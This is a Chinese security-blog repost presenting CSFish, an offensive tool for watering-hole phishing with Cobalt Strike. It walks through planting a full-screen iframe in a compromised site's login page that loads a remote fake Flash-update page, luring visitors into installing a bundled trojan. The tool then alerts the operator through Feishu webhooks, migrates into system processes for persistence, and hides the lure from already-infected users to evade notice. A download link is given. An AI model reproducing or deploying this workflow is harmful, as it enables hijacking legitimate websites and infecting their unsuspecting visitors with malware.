CSFish—实现水坑钓鱼自动收杆&CS上线提醒&自动权限维持

admin 2024年8月24日22:08:48评论43 views字数 1876阅读6分15秒阅读模式
d

免责声明:本篇文章仅用于技术交流,请勿利用文章内的相关技术从事非法测试由于传播、利用本公众号无影安全实验室所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号无影安全实验室及作者不为此承担任何责任,一旦造成后果请自行承担!

朋友们现在只对常读和星标的公众号才展示大图推送,建议大家把"无影安全实验室"设为星标,这样更新文章也能第一时间推送!

CSFish—实现水坑钓鱼自动收杆&CS上线提醒&自动权限维持

安全工具

0x01 前言

水坑攻击属于APT攻击的一种,与其他社会工程手段(例如网络钓鱼)相比,水坑攻击的危险性来源于其利用的是不会被列入黑名单的合法网站。黑客无需耗费精力制作钓鱼网站,而是利用合法网站的弱点,隐蔽性比较强,更难被发现。访问者出于对这些网站的一贯信任,更容易放松警惕,继而落入水坑陷阱之中。
最近自己也在研究水坑钓鱼这块的内容,发现从攻击者视角来看,水坑钓鱼存在几个关键技术点,第一就是钓鱼收杆,为什么呢,因为访问者踩了水坑,如果还一直触发钓鱼页面,肯定容易被察觉,从而可能导致权限丢失,所以需要在用户踩了水坑上线后,需要进行钓鱼收杆,其次是CS上线提醒和权限维持,可以在第一时间知道目标上线并做好简单的权限维持和后续工作,保障权限的稳定性,于是基于以上理念,开发了CSFish这款水坑钓鱼工具。

0x02 工具介绍

CSFish可以实现自动收杆+上线通知+权限维持,比如当在目标网站埋下水坑后,A用户访问此业务网站触发水坑,访问了钓鱼网站,下载木马并执行上线后,CS会第一时间发送上线通知到飞书或者钉钉,同时会自动进行进程迁移到系统进程,以达到木马隐蔽,权限维持目的,且当A用户再次访问此业务网站时,则不会再触发访问到钓鱼网站,但是B用户仍然可以触发访问到钓鱼网站,这样水坑钓鱼攻击则不易被识破,从而钓到更多的鱼。

CSFish功能实现的思维导图如下:

CSFish—实现水坑钓鱼自动收杆&CS上线提醒&自动权限维持

备注:说明一下,为什么我会在此项目加入比较内网IP的原因,因为如果是已经突破进入了内网环境的情况下,要进行内网横向,假设如果拿下了一个内网的PHP环境的业务网站服务器,那么可以把这套项目迁移到这个内网服务器的web目录下部署水坑,此时如果不比较内网IP地址,则无法收杆,因为此时fish.php获取到的访问IP一定是一个内网IP。

0x03 工具演示

1、假设此处我通过漏洞或者getshell获得了修改前端文件的权限,我在登录页面
login.html中嵌入一个iframe标签,使远程服务器的html(此处我的钓鱼文件是部署在云服务器的)能远程加载到业务网站的登录页面。

CSFish—实现水坑钓鱼自动收杆&CS上线提醒&自动权限维持

<iframe src="http://xxxx/index.html" style="position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;"></iframe>

2、当用户访问业务网站登录页面时,则会访问到钓鱼页面,此处钓鱼页面用的是flash模版,效果如下,点击立即升级(注意:此处使用iframe是让远程服务器的页面加载到业务网站的页面,所以上方地址栏不会显示为你加载的钓鱼页面网址,而是业务网站自身网址,这样会增强访问者的信任)

CSFish—实现水坑钓鱼自动收杆&CS上线提醒&自动权限维持

3、点击立即升级,会跳转到下载页面,点击立即下载,则会下载到通过精心构造的捆绑木马安装包

CSFish—实现水坑钓鱼自动收杆&CS上线提醒&自动权限维持

CSFish—实现水坑钓鱼自动收杆&CS上线提醒&自动权限维持

4、点击安装即可上线CS,上线CS后,CS客户端或者服务端(根据插件CSFish.cna加载位置)则会自动获取becaon信息并把相应信息发送到远程服务器PHP,并实现自动进程迁移,以达到隐蔽木马进程,权限维持的作用。

CSFish—实现水坑钓鱼自动收杆&CS上线提醒&自动权限维持

5、远程服务器的PHP接收到来之CS发送过来的主机信息后,会把主机的出口IP地址和内网地址写入到两个文本文件中保存,用于记录已经上线的主机信息。

CSFish—实现水坑钓鱼自动收杆&CS上线提醒&自动权限维持

CSFish—实现水坑钓鱼自动收杆&CS上线提醒&自动权限维持

6、PHP除了记录IP信息外,还会获取其它信息,例如,监听器、载荷名、用户名、时间戳等信息,并把这些信息通过webhook地址发送到飞书,实现CS上线提醒。

CSFish—实现水坑钓鱼自动收杆&CS上线提醒&自动权限维持

7、CS上线提醒效果如下图(飞书APP通知权限打开,就可以像vx一样弹窗提醒)

CSFish—实现水坑钓鱼自动收杆&CS上线提醒&自动权限维持

8、当访问者已经上线后,再次去访问业务网站的登录页面,则自动恢复为正常的业务网站登录页面样子,不再加载钓鱼页面,从而实现钓鱼收杆。

CSFish—实现水坑钓鱼自动收杆&CS上线提醒&自动权限维持

0x04 工具下载

下载地址和使用说明:
https://github.com/shine798/CSFish

原文始发于微信公众号(无影安全实验室):CSFish—实现水坑钓鱼自动收杆&CS上线提醒&自动权限维持

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年8月24日22:08:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CSFish—实现水坑钓鱼自动收杆&CS上线提醒&自动权限维持https://cn-sec.com/archives/3088321.html

发表评论

匿名网友 填写信息